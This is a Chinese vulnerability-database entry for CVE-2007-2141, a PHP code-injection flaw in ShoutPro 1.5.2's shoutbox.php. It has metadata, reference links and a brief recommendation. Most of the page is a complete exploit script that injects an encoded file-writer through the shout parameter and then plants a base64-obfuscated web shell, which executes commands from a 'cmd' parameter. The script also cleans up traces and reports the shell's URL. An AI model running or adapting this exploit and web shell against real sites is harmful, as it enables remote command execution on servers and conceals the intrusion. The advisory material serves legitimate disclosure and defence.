ShoutPro 'shoutbox.php' 直接静态代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112729 漏洞类型 输入验证
发布时间 2007-04-17 更新时间 2007-04-19
CVE编号 CVE-2007-2141 CNNVD-ID CNNVD-200704-391
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3758
https://cxsecurity.com/issue/WLB-2007040100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-391
|漏洞详情
ShoutPro的shoutbox.php中存在直接静态代码注入漏洞。远程攻击者可以借助shout参数,注入任意的PHP代码到脚本shouts.php。
|漏洞EXP
<?/*
File: shoutbox.php
Affects: ShoutPro 1.5.2 (may affect earlier versions)
Date: 17th April 2007

Issue Description:
===========================================================================
ShoutPro 1.5.2 fails to fully sanitize user input ($shout) that it writes
to the shouts.php file when adding a new message, this can result in the
injection and execution of arbitrary php code.
===========================================================================

Scope:
===========================================================================
The vulnerability will in most cases allow an attacker to execute commands
on the system, the issue may be further perpetuated if the user has followed
the official documentation and chmoded the base folder to '777'
===========================================================================

Recommendation:
===========================================================================
1) Add code to perform strip_tags() on $shout in shoutbox.php
2) Prevent direct access to shouts.php with a .htaccess file
===========================================================================

Discovered By: Gammarays
*/?>


<?php

echo "########################################################\n";
echo "#   Special Greetings To - Timq,Warpboy,The-Maggot     #\n";
echo "########################################################\n\n\n";

//Writes Files - Under 100 bytes to meet requirements
$temppayload = "%3C%3F%24a%3Dfopen%28%24_POST%5B%27f%27%5D%2C%27w%27%29%3Bfwrite%28%24a%2Cbase64_decode%28%24_POST%5B%27d%27%5D%29%29%3Bfclose%28%24a%29%3B%3F%3E";

//Execute Commands + Performs Cleanup
$payload = "PD9waHAgCgppZihpc3NldCgkX0dFVFsnY21kJ10pKQp7CmVjaG8gc2hlbGxfZXhlYyh1cmxkZWNv".
          "ZGUoJF9HRVRbJ2NtZCddKSk7CmRpZSgpOwp9CgppZigkX1BPU1RbJ2NsZWFuJ109PSdkb2l0Jykg".
          "Y2xlYW4oKTsKCmZ1bmN0aW9uIGNsZWFuKCkKewogICRsMSA9IGZpbGUoJ3Nob3V0cy5waHAnKTsK".
          "ICAkZmggPSBmb3Blbignc2hvdXRzLnBocCcsJ3cnKTsKICBpZighJGZoKSBkaWUoKTsKCiAgZm9y".
          "ZWFjaCAoJGwxIGFzICRsMikgCiAgewoJaWYoIXN0cnN0cigkbDIsIiRhPWZvcGVuIikpCgl7CgkJ".
          "ZnByaW50ZigkZmgsJGwyKTsKCX0gICAgCiAgfQogIGZjbG9zZSgkZmgpOwp9Cgo/Pg==";



if($argc!=2) die("Usage: <url> \n\tEx: http://www.example.com/shoutpro/\n");

$url = $argv[1];
//$url = "http://localhost/ShoutPro1.5.2/";

$ch = curl_init($url . "shoutbox.php");
if(!$ch) die("Error Initializing CURL");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(!$res) die("Error Connecting To Target - Is URL Valid?");

echo "[ ] Deploying Temp Payload...\n";

curl_setopt($ch, CURLOPT_URL,$url . "shoutbox.php?action=post");
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"name=Beethoven&pass=&shout=".$temppayload."&post=Post");
$res = curl_exec($ch);
if(!$res) die("Error Deploying Temp Payload");

echo "[ ] Deploying Main Payload...\n";

curl_setopt($ch, CURLOPT_URL,$url . "shouts.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"f=module.php&d=".$payload);
$res = curl_exec($ch);
if(!$res) die("Error Deploying Main Payload");

echo "[ ] Attempting Clean Up...\n";

curl_setopt($ch, CURLOPT_URL,$url . "module.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"clean=doit");
$res = curl_exec($ch);
if(!$res) die("Error - Clean Up Failed");

echo "[ ] Clean Up Complete\n";
echo "[ ] Shell Accessible at ".$url."module.php?cmd=<yourcommand>";

curl_close($ch);
?>

# milw0rm.com [2007-04-17]
|参考资料

来源:BID
名称:23542
链接:http://www.securityfocus.com/bid/23542
来源:BUGTRAQ
名称:20070417ShoutPro1.5.2-arbitrarycodeexecution
链接:http://www.securityfocus.com/archive/1/archive/1/466037/100/0/threaded
来源:MILW0RM
名称:3758
链接:http://www.milw0rm.com/exploits/3758
来源:VUPEN
名称:ADV-2007-1432
链接:http://www.frsirt.com/english/advisories/2007/1432
来源:OSVDB
名称:34999
链接:http://osvdb.org/34999
来源:XF
名称:shoutpro-shouts-code-execution(33727)
链接:http://xforce.iss.net/xforce/xfdb/33727
来源:SREASON
名称:2593
链接:http://securityreason.com/securityalert/2593
来源:SECUNIA
名称:24939
链接:http://secunia.com/advisories/24939